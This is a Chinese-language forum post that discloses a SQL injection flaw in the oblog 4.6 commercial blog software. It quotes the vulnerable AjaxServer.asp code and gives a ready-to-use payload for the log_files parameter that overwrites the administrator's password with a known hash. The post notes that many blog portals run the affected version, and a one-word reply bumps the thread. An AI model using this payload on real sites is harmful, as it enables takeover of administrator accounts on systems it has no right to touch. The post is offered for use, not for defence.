oblog商业版本4.6注射漏洞,直接拿管理员
<P>oblog商业版本4.6注射漏洞,直接拿管理员</P><P> </P>
<P><A class=Channel_KeyLink href="http://www.05112.com/">漏洞</A>描述:<BR>通过构造特定的语句,可以更改任何用户的密码,包括管理员,严重级<A class=Channel_KeyLink href="http://www.05112.com/">漏洞</A>。<BR><BR><A class=Channel_KeyLink href="http://www.05112.com/">漏洞</A>文件:AjaxServer.asp<BR>变量:log_files<BR>语句:<BR>
<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#f3f3f3><FONT style="FONT-WEIGHT: bold; COLOR: #990000">以下是引用片段:</FONT><BR>log_files=Replace(log_files," ","")<BR>If Left(log_files,1)="," Then log_files=Right(log_files,Len(log_files)-1)<BR>rs("logpics") = log_files<BR>'附加文件处理<BR>If log_files <>"" Then<BR>oblog.Execute "Update oblog_upfile Set logid=" & tid & " Where fileid In (" & log_files & ")"<BR>End if<BR>'Tag处理</TD></TR></TBODY></TABLE><BR><BR>利用:<BR>首先找到使用sql版本的系统注册用户test,发表新日志,同时抓包, 修改log_files。2);update/**/oblog_user/**/set/**/password=7a57a5a743894a0e/**/where/**/username=admin;--<BR>关于怎么区别sql和access的版本,目前也没发现好的方法,但是可以通过查看ver.asp文件看到当前版本号。某些版本好象没这文件。 官方好象出补丁了。很多blog门户站都是用的sql的版本,大家就悠着点吧。 </P>
re:oblog商业版本4.6注射漏洞,直接拿管理员
<P>顶!</P>
页:
[1]